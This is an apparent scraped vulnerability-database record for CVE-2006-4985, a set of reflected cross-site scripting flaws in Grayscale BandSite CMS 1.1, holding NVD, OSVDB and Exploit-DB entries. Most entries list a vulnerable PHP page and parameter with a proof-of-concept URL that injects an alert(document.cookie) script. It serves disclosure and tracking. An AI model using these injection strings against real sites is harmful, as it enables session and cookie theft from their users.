source: http://www.securityfocus.com/bid/20137/info
Grayscale BandSite CMS is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied input data.
These issues may allow an attacker to access sensitive information, execute arbitrary server-side script code in the context of the affected webserver, or execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This could help the attacker steal cookie-based authentication credentials; other attacks are possible.
Version 1.1.0 is vulnerable; other versions may also be affected.
http://www.example.com/includes/content/pastshows_content.php?the_band=<script>alert(document.cookie);</script>
{"id": "EDB-ID:28632", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Grayscale BandSite CMS 1.1 pastshows_content.php the_band Parameter XSS", "description": "Grayscale BandSite CMS 1.1 pastshows_content.php the_band Parameter XSS. CVE-2006-4985. Webapps exploit for php platform", "published": "2006-09-21T00:00:00", "modified": "2006-09-21T00:00:00", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "href": "https://www.exploit-db.com/exploits/28632/", "reporter": "HACKERS PAL", "references": [], "cvelist": ["CVE-2006-4985"], "lastseen": "2016-02-03T08:35:07", "viewCount": 2, "enchantments": {"score": {"value": 4.3, "vector": "NONE", "modified": "2016-02-03T08:35:07", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2006-4985"]}, {"type": "exploitdb", "idList": ["EDB-ID:28618", "EDB-ID:28624", "EDB-ID:28621", "EDB-ID:28629", "EDB-ID:28638", "EDB-ID:28622", "EDB-ID:28617", "EDB-ID:28619", "EDB-ID:28637", "EDB-ID:28628"]}, {"type": "osvdb", "idList": ["OSVDB:29340", "OSVDB:29337", "OSVDB:29329", "OSVDB:29335", "OSVDB:29326", "OSVDB:29338", "OSVDB:29323", "OSVDB:29319", "OSVDB:29334", "OSVDB:29332"]}], "modified": "2016-02-03T08:35:07", "rev": 2}, "vulnersScore": 4.3}, "sourceHref": "https://www.exploit-db.com/download/28632/", "sourceData": "source: http://www.securityfocus.com/bid/20137/info\r\n \r\nGrayscale BandSite CMS is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied input data.\r\n \r\nThese issues may allow an attacker to access sensitive information, execute arbitrary server-side script code in the context of the affected webserver, or execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This could help the attacker steal cookie-based authentication credentials; other attacks are possible.\r\n \r\nVersion 1.1.0 is vulnerable; other versions may also be affected.\r\n\r\nhttp://www.example.com/includes/content/pastshows_content.php?the_band=<script>alert(document.cookie);</script>", "osvdbidlist": ["29334"]}
{"cve": [{"lastseen": "2020-10-03T11:48:18", "description": "Multiple cross-site scripting (XSS) vulnerabilities in Grayscale BandSite CMS allow remote attackers to inject arbitrary web script or HTML via (1) the max_file_size_purdy parameter in adminpanel/includes/helpfiles/help_mp3.php, (2) the message_text parameter in adminpanel/includes/mailinglist/sendemail.php, (3) the this_year parameter in includes/footer.php, and the band parameter in (4) adminpanel/includes/helpfiles/help_news.php (5) adminpanel/includes/helpfiles/help_merch.php, (6) adminpanel/includes/header.php, and (7) adminpanel/login_header.php; and includes/content/ files including (8) bio_content.php, (9) gbook_content.php, (10) interview_content.php, (11) links_content.php, (12) lyrics_content.php, (13) member_content.php, (14) merch_content.php, (15) mp3_content.php, (16) news_content.php, (17) pastshows_content.php, (18) photo_content.php, (19) releases_content.php, (20) reviews_content.php, (21) shows_content.php, and (22) signgbook_content.php.", "edition": 3, "cvss3": {}, "published": "2006-09-26T02:07:00", "title": "CVE-2006-4985", "type": "cve", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2006-4985"], "modified": "2018-10-17T21:40:00", "cpe": ["cpe:/a:grayscale:bandsite_cms:1.1"], "id": "CVE-2006-4985", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-4985", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:grayscale:bandsite_cms:1.1:*:*:*:*:*:*:*"]}], "osvdb": [{"lastseen": "2017-04-28T13:20:25", "bulletinFamily": "software", "cvelist": ["CVE-2006-4985"], "edition": 1, "description": "## Manual Testing Notes\n/adminpanel/includes/helpfiles/help_news.php?the_band=<script>alert(document.cookie);</script>\n## References:\nVendor URL: http://sourceforge.net/projects/bandsitecms/\n[Secunia Advisory ID:21992](https://secuniaresearch.flexerasoftware.com/advisories/21992/)\n[Related OSVDB ID: 29316](https://vulners.com/osvdb/OSVDB:29316)\n[Related OSVDB ID: 29318](https://vulners.com/osvdb/OSVDB:29318)\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-09/0341.html\n[CVE-2006-4985](https://vulners.com/cve/CVE-2006-4985)\nBugtraq ID: 20137\n", "modified": "2006-09-20T15:03:50", "published": "2006-09-20T15:03:50", "href": "https://vulners.com/osvdb/OSVDB:29319", "id": "OSVDB:29319", "title": "BandSite CMS help_news.php the_band Variable XSS", "type": "osvdb", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2017-04-28T13:20:25", "bulletinFamily": "software", "cvelist": ["CVE-2006-4985"], "edition": 1, "description": "## Manual Testing Notes\n/adminpanel/includes/helpfiles/help_merch.php?the_band=<script>alert(document.cookie);</script>\n## References:\nVendor URL: http://sourceforge.net/projects/bandsitecms/\n[Secunia Advisory ID:21992](https://secuniaresearch.flexerasoftware.com/advisories/21992/)\n[Related OSVDB ID: 29316](https://vulners.com/osvdb/OSVDB:29316)\n[Related OSVDB ID: 29318](https://vulners.com/osvdb/OSVDB:29318)\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-09/0341.html\n[CVE-2006-4985](https://vulners.com/cve/CVE-2006-4985)\nBugtraq ID: 20137\n", "modified": "2006-09-20T15:03:50", "published": "2006-09-20T15:03:50", "href": "https://vulners.com/osvdb/OSVDB:29320", "id": "OSVDB:29320", "title": "BandSite CMS help_merch.php the_band Variable XSS", "type": "osvdb", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2017-04-28T13:20:25", "bulletinFamily": "software", "cvelist": ["CVE-2006-4985"], "edition": 1, "description": "## Manual Testing Notes\n/adminpanel/includes/mailinglist/sendemail.php?message_text=</textarea><script>alert(document.cookie);</script>\n## References:\nVendor URL: http://sourceforge.net/projects/bandsitecms/\n[Secunia Advisory ID:21992](https://secuniaresearch.flexerasoftware.com/advisories/21992/)\n[Related OSVDB ID: 29316](https://vulners.com/osvdb/OSVDB:29316)\n[Related OSVDB ID: 29318](https://vulners.com/osvdb/OSVDB:29318)\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-09/0341.html\n[CVE-2006-4985](https://vulners.com/cve/CVE-2006-4985)\nBugtraq ID: 20137\n", "modified": "2006-09-20T15:03:50", "published": "2006-09-20T15:03:50", "href": "https://vulners.com/osvdb/OSVDB:29322", "id": "OSVDB:29322", "title": "BandSite CMS sendemail.php message_text Variable XSS", "type": "osvdb", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2017-04-28T13:20:25", "bulletinFamily": "software", "cvelist": ["CVE-2006-4985"], "edition": 1, "description": "## Manual Testing Notes\n/adminpanel/includes/header.php?the_band=</title><script>alert(document.cookie);</script>\n## References:\nVendor URL: http://sourceforge.net/projects/bandsitecms/\n[Secunia Advisory ID:21992](https://secuniaresearch.flexerasoftware.com/advisories/21992/)\n[Related OSVDB ID: 29316](https://vulners.com/osvdb/OSVDB:29316)\n[Related OSVDB ID: 29318](https://vulners.com/osvdb/OSVDB:29318)\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-09/0341.html\n[CVE-2006-4985](https://vulners.com/cve/CVE-2006-4985)\nBugtraq ID: 20137\n", "modified": "2006-09-20T15:03:50", "published": "2006-09-20T15:03:50", "href": "https://vulners.com/osvdb/OSVDB:29323", "id": "OSVDB:29323", "title": "BandSite CMS header.php the_band Variable XSS", "type": "osvdb", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2017-04-28T13:20:25", "bulletinFamily": "software", "cvelist": ["CVE-2006-4985"], "edition": 1, "description": "## Manual Testing Notes\n/adminpanel/login_header.php?the_band=</title><script>alert(document.cookie);</script>\n## References:\nVendor URL: http://sourceforge.net/projects/bandsitecms/\n[Secunia Advisory ID:21992](https://secuniaresearch.flexerasoftware.com/advisories/21992/)\n[Related OSVDB ID: 29316](https://vulners.com/osvdb/OSVDB:29316)\n[Related OSVDB ID: 29318](https://vulners.com/osvdb/OSVDB:29318)\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-09/0341.html\n[CVE-2006-4985](https://vulners.com/cve/CVE-2006-4985)\nBugtraq ID: 20137\n", "modified": "2006-09-20T15:03:50", "published": "2006-09-20T15:03:50", "href": "https://vulners.com/osvdb/OSVDB:29324", "id": "OSVDB:29324", "title": "BandSite CMS login_header.php the_band Variable XSS", "type": "osvdb", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2017-04-28T13:20:25", "bulletinFamily": "software", "cvelist": ["CVE-2006-4985"], "edition": 1, "description": "## Manual Testing Notes\n/includes/content/gbook_content.php?the_band=<script>alert(document.cookie);</script>\n## References:\nVendor URL: http://sourceforge.net/projects/bandsitecms/\n[Secunia Advisory ID:21992](https://secuniaresearch.flexerasoftware.com/advisories/21992/)\n[Related OSVDB ID: 29316](https://vulners.com/osvdb/OSVDB:29316)\n[Related OSVDB ID: 29318](https://vulners.com/osvdb/OSVDB:29318)\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-09/0341.html\n[CVE-2006-4985](https://vulners.com/cve/CVE-2006-4985)\nBugtraq ID: 20137\n", "modified": "2006-09-20T15:03:50", "published": "2006-09-20T15:03:50", "href": "https://vulners.com/osvdb/OSVDB:29326", "id": "OSVDB:29326", "title": "BandSite CMS gbook_content.php the_band Variable XSS", "type": "osvdb", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2017-04-28T13:20:25", "bulletinFamily": "software", "cvelist": ["CVE-2006-4985"], "edition": 1, "description": "## Manual Testing Notes\n/includes/content/links_content.php?the_band=<script>alert(document.cookie);</script>\n## References:\nVendor URL: http://sourceforge.net/projects/bandsitecms/\n[Secunia Advisory ID:21992](https://secuniaresearch.flexerasoftware.com/advisories/21992/)\n[Related OSVDB ID: 29316](https://vulners.com/osvdb/OSVDB:29316)\n[Related OSVDB ID: 29318](https://vulners.com/osvdb/OSVDB:29318)\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-09/0341.html\n[CVE-2006-4985](https://vulners.com/cve/CVE-2006-4985)\nBugtraq ID: 20137\n", "modified": "2006-09-20T15:03:50", "published": "2006-09-20T15:03:50", "href": "https://vulners.com/osvdb/OSVDB:29328", "id": "OSVDB:29328", "title": "BandSite CMS links_content.php the_band Variable XSS", "type": "osvdb", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2017-04-28T13:20:25", "bulletinFamily": "software", "cvelist": ["CVE-2006-4985"], "edition": 1, "description": "## Manual Testing Notes\n/includes/content/merch_content.php?the_band=<script>alert(document.cookie);</script>\n## References:\nVendor URL: http://sourceforge.net/projects/bandsitecms/\n[Secunia Advisory ID:21992](https://secuniaresearch.flexerasoftware.com/advisories/21992/)\n[Related OSVDB ID: 29316](https://vulners.com/osvdb/OSVDB:29316)\n[Related OSVDB ID: 29318](https://vulners.com/osvdb/OSVDB:29318)\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-09/0341.html\n[CVE-2006-4985](https://vulners.com/cve/CVE-2006-4985)\nBugtraq ID: 20137\n", "modified": "2006-09-20T15:03:50", "published": "2006-09-20T15:03:50", "href": "https://vulners.com/osvdb/OSVDB:29331", "id": "OSVDB:29331", "title": "BandSite CMS merch_content.php the_band Variable XSS", "type": "osvdb", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2017-04-28T13:20:25", "bulletinFamily": "software", "cvelist": ["CVE-2006-4985"], "edition": 1, "description": "## Manual Testing Notes\n/includes/content/mp3_content.php?the_band=<script>alert(document.cookie);</script>\n## References:\nVendor URL: http://sourceforge.net/projects/bandsitecms/\n[Secunia Advisory ID:21992](https://secuniaresearch.flexerasoftware.com/advisories/21992/)\n[Related OSVDB ID: 29316](https://vulners.com/osvdb/OSVDB:29316)\n[Related OSVDB ID: 29318](https://vulners.com/osvdb/OSVDB:29318)\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-09/0341.html\n[CVE-2006-4985](https://vulners.com/cve/CVE-2006-4985)\nBugtraq ID: 20137\n", "modified": "2006-09-20T15:03:50", "published": "2006-09-20T15:03:50", "href": "https://vulners.com/osvdb/OSVDB:29332", "id": "OSVDB:29332", "title": "BandSite CMS mp3_content.php the_band Variable XSS", "type": "osvdb", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2017-04-28T13:20:25", "bulletinFamily": "software", "cvelist": ["CVE-2006-4985"], "edition": 1, "description": "## Manual Testing Notes\n/includes/content/news_content.php?the_band=<script>alert(document.cookie);</script>\n## References:\nVendor URL: http://sourceforge.net/projects/bandsitecms/\n[Secunia Advisory ID:21992](https://secuniaresearch.flexerasoftware.com/advisories/21992/)\n[Related OSVDB ID: 29316](https://vulners.com/osvdb/OSVDB:29316)\n[Related OSVDB ID: 29318](https://vulners.com/osvdb/OSVDB:29318)\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-09/0341.html\n[CVE-2006-4985](https://vulners.com/cve/CVE-2006-4985)\nBugtraq ID: 20137\n", "modified": "2006-09-20T15:03:50", "published": "2006-09-20T15:03:50", "href": "https://vulners.com/osvdb/OSVDB:29333", "id": "OSVDB:29333", "title": "BandSite CMS news_content.php the_band Variable XSS", "type": "osvdb", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}], "exploitdb": [{"lastseen": "2016-02-03T08:33:04", "description": "Grayscale BandSite CMS 1.1 help_news.php the_band Parameter XSS. CVE-2006-4985. Webapps exploit for php platform", "published": "2006-09-21T00:00:00", "type": "exploitdb", "title": "Grayscale BandSite CMS 1.1 help_news.php the_band Parameter XSS", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-4985"], "modified": "2006-09-21T00:00:00", "id": "EDB-ID:28617", "href": "https://www.exploit-db.com/exploits/28617/", "sourceData": "source: http://www.securityfocus.com/bid/20137/info\r\n\r\nGrayscale BandSite CMS is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied input data.\r\n\r\nThese issues may allow an attacker to access sensitive information, execute arbitrary server-side script code in the context of the affected webserver, or execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This could help the attacker steal cookie-based authentication credentials; other attacks are possible.\r\n\r\nVersion 1.1.0 is vulnerable; other versions may also be affected.\r\n\r\nhttp://www.example.com/adminpanel/includes/helpfiles/help_news.php?the_band=<script>alert(document.cookie);</script> ", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/28617/"}, {"lastseen": "2016-02-03T08:33:13", "description": "Grayscale BandSite CMS 1.1 help_merch.php the_band Parameter XSS. CVE-2006-4985. Webapps exploit for php platform", "published": "2006-09-21T00:00:00", "type": "exploitdb", "title": "Grayscale BandSite CMS 1.1 help_merch.php the_band Parameter XSS", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-4985"], "modified": "2006-09-21T00:00:00", "id": "EDB-ID:28618", "href": "https://www.exploit-db.com/exploits/28618/", "sourceData": "source: http://www.securityfocus.com/bid/20137/info\r\n \r\nGrayscale BandSite CMS is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied input data.\r\n \r\nThese issues may allow an attacker to access sensitive information, execute arbitrary server-side script code in the context of the affected webserver, or execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This could help the attacker steal cookie-based authentication credentials; other attacks are possible.\r\n \r\nVersion 1.1.0 is vulnerable; other versions may also be affected.\r\n\r\nhttp://www.example.com/adminpanel/includes/helpfiles/help_merch.php?the_band=<script>alert(document.cookie);</script>", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/28618/"}, {"lastseen": "2016-02-03T08:33:20", "description": "Grayscale BandSite CMS 1.1 help_mp3.php max_file_size_purdy Parameter XSS. CVE-2006-4985. Webapps exploit for php platform", "published": "2006-09-21T00:00:00", "type": "exploitdb", "title": "Grayscale BandSite CMS 1.1 help_mp3.php max_file_size_purdy Parameter XSS", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-4985"], "modified": "2006-09-21T00:00:00", "id": "EDB-ID:28619", "href": "https://www.exploit-db.com/exploits/28619/", "sourceData": "source: http://www.securityfocus.com/bid/20137/info\r\n \r\nGrayscale BandSite CMS is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied input data.\r\n \r\nThese issues may allow an attacker to access sensitive information, execute arbitrary server-side script code in the context of the affected webserver, or execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This could help the attacker steal cookie-based authentication credentials; other attacks are possible.\r\n \r\nVersion 1.1.0 is vulnerable; other versions may also be affected.\r\n\r\nhttp://www.example.com/adminpanel/includes/helpfiles/help_mp3.php?max_file_size_purdy=<script>alert(document.cookie);</script> ", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/28619/"}, {"lastseen": "2016-02-03T08:33:29", "description": "Grayscale BandSite CMS 1.1 sendemail.php message_text Parameter XSS. CVE-2006-4985. Webapps exploit for php platform", "published": "2006-09-21T00:00:00", "type": "exploitdb", "title": "Grayscale BandSite CMS 1.1 sendemail.php message_text Parameter XSS", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-4985"], "modified": "2006-09-21T00:00:00", "id": "EDB-ID:28620", "href": "https://www.exploit-db.com/exploits/28620/", "sourceData": "source: http://www.securityfocus.com/bid/20137/info\r\n \r\nGrayscale BandSite CMS is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied input data.\r\n \r\nThese issues may allow an attacker to access sensitive information, execute arbitrary server-side script code in the context of the affected webserver, or execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This could help the attacker steal cookie-based authentication credentials; other attacks are possible.\r\n \r\nVersion 1.1.0 is vulnerable; other versions may also be affected.\r\n\r\nhttp://www.example.com/adminpanel/includes/mailinglist/sendemail.php?message_text=</textarea><script>alert(document.cookie);</script>", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/28620/"}, {"lastseen": "2016-02-03T08:33:44", "description": "Grayscale BandSite CMS 1.1 login_header.php the_band Parameter XSS. CVE-2006-4985. Webapps exploit for php platform", "published": "2006-09-21T00:00:00", "type": "exploitdb", "title": "Grayscale BandSite CMS 1.1 login_header.php the_band Parameter XSS", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-4985"], "modified": "2006-09-21T00:00:00", "id": "EDB-ID:28622", "href": "https://www.exploit-db.com/exploits/28622/", "sourceData": "source: http://www.securityfocus.com/bid/20137/info\r\n \r\nGrayscale BandSite CMS is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied input data.\r\n \r\nThese issues may allow an attacker to access sensitive information, execute arbitrary server-side script code in the context of the affected webserver, or execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This could help the attacker steal cookie-based authentication credentials; other attacks are possible.\r\n \r\nVersion 1.1.0 is vulnerable; other versions may also be affected.\r\n\r\nhttp://www.example.com/adminpanel/login_header.php?the_band=</title><script>alert(document.cookie);</script>", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/28622/"}, {"lastseen": "2016-02-03T08:33:52", "description": "Grayscale BandSite CMS 1.1 bio_content.php the_band Parameter XSS. CVE-2006-4985. Webapps exploit for php platform", "published": "2006-09-21T00:00:00", "type": "exploitdb", "title": "Grayscale BandSite CMS 1.1 bio_content.php the_band Parameter XSS", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-4985"], "modified": "2006-09-21T00:00:00", "id": "EDB-ID:28623", "href": "https://www.exploit-db.com/exploits/28623/", "sourceData": "source: http://www.securityfocus.com/bid/20137/info\r\n \r\nGrayscale BandSite CMS is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied input data.\r\n \r\nThese issues may allow an attacker to access sensitive information, execute arbitrary server-side script code in the context of the affected webserver, or execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This could help the attacker steal cookie-based authentication credentials; other attacks are possible.\r\n \r\nVersion 1.1.0 is vulnerable; other versions may also be affected.\r\n\r\nhttp://www.example.com/includes/content/bio_content.php?the_band=<Script>alert(document.cookie);</script>", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/28623/"}, {"lastseen": "2016-02-03T08:33:59", "description": "Grayscale BandSite CMS 1.1 gbook_content.php the_band Parameter XSS. CVE-2006-4985. Webapps exploit for php platform", "published": "2006-09-21T00:00:00", "type": "exploitdb", "title": "Grayscale BandSite CMS 1.1 gbook_content.php the_band Parameter XSS", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-4985"], "modified": "2006-09-21T00:00:00", "id": "EDB-ID:28624", "href": "https://www.exploit-db.com/exploits/28624/", "sourceData": "source: http://www.securityfocus.com/bid/20137/info\r\n \r\nGrayscale BandSite CMS is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied input data.\r\n \r\nThese issues may allow an attacker to access sensitive information, execute arbitrary server-side script code in the context of the affected webserver, or execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This could help the attacker steal cookie-based authentication credentials; other attacks are possible.\r\n \r\nVersion 1.1.0 is vulnerable; other versions may also be affected.\r\n\r\nhttp://www.example.com/includes/content/gbook_content.php?the_band=<script>alert(document.cookie);</script> ", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/28624/"}, {"lastseen": "2016-02-03T08:34:07", "description": "Grayscale BandSite CMS 1.1 interview_content.php the_band Parameter XSS. CVE-2006-4985. Webapps exploit for php platform", "published": "2006-09-21T00:00:00", "type": "exploitdb", "title": "Grayscale BandSite CMS 1.1 interview_content.php the_band Parameter XSS", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-4985"], "modified": "2006-09-21T00:00:00", "id": "EDB-ID:28625", "href": "https://www.exploit-db.com/exploits/28625/", "sourceData": "source: http://www.securityfocus.com/bid/20137/info\r\n \r\nGrayscale BandSite CMS is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied input data.\r\n \r\nThese issues may allow an attacker to access sensitive information, execute arbitrary server-side script code in the context of the affected webserver, or execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This could help the attacker steal cookie-based authentication credentials; other attacks are possible.\r\n \r\nVersion 1.1.0 is vulnerable; other versions may also be affected.\r\n\r\nhttp://www.example.com/includes/content/interview_content.php?the_band=<script>alert(document.cookie);</script>", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/28625/"}, {"lastseen": "2016-02-03T08:34:16", "description": "Grayscale BandSite CMS 1.1 links_content.php the_band Parameter XSS. CVE-2006-4985. Webapps exploit for php platform", "published": "2006-09-21T00:00:00", "type": "exploitdb", "title": "Grayscale BandSite CMS 1.1 links_content.php the_band Parameter XSS", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-4985"], "modified": "2006-09-21T00:00:00", "id": "EDB-ID:28626", "href": "https://www.exploit-db.com/exploits/28626/", "sourceData": "source: http://www.securityfocus.com/bid/20137/info\r\n \r\nGrayscale BandSite CMS is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied input data.\r\n \r\nThese issues may allow an attacker to access sensitive information, execute arbitrary server-side script code in the context of the affected webserver, or execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This could help the attacker steal cookie-based authentication credentials; other attacks are possible.\r\n \r\nVersion 1.1.0 is vulnerable; other versions may also be affected.\r\n\r\nhttp://www.example.com/includes/content/links_content.php?the_band=<script>alert(document.cookie);</script>", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/28626/"}, {"lastseen": "2016-02-03T08:34:24", "description": "Grayscale BandSite CMS 1.1 lyrics_content.php the_band Parameter XSS. CVE-2006-4985. Webapps exploit for php platform", "published": "2006-09-21T00:00:00", "type": "exploitdb", "title": "Grayscale BandSite CMS 1.1 lyrics_content.php the_band Parameter XSS", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-4985"], "modified": "2006-09-21T00:00:00", "id": "EDB-ID:28627", "href": "https://www.exploit-db.com/exploits/28627/", "sourceData": "source: http://www.securityfocus.com/bid/20137/info\r\n \r\nGrayscale BandSite CMS is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied input data.\r\n \r\nThese issues may allow an attacker to access sensitive information, execute arbitrary server-side script code in the context of the affected webserver, or execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This could help the attacker steal cookie-based authentication credentials; other attacks are possible.\r\n \r\nVersion 1.1.0 is vulnerable; other versions may also be affected.\r\n\r\nhttp://www.example.com/includes/content/lyrics_content.php?the_band=<script>alert(document.cookie);</script>", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/28627/"}]}